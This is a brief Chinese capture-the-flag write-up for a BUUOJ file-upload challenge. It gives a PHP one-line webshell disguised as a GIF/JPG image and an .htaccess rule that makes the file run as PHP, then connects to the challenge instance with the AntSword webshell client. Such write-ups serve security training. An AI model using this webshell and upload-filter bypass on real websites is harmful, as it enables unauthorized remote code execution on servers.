题目地址:https://buuoj.cn/challenges
解题思路
第一步:进入题目,一个文件上传框,推测是使用一句话木马获取shell查找flag
第二步:上传伪装好的pass.png,发现错误
pass.png内容:
GIF89a? <script language="php">eval($_REQUEST[pass])</script>
第三步:将png格式修改为jpg格式上传,成功
第四步:上传.htaccess文件,让pass.jpg文件以php格式解析,注意修改Content-Type: image/jpeg
.htaccess内容:
<FilesMatch "pass">
SetHandler application/x-httpd-php
</FilesMatch>
第五步:使用蚁剑连接获取flag
连接地址:http://e9f56dea-cdf2-4fe5-89dc-4710a148af17.node3.buuoj.cn/upload/7710e6877fe009e1daa5fed88457fc86/pass.jpg
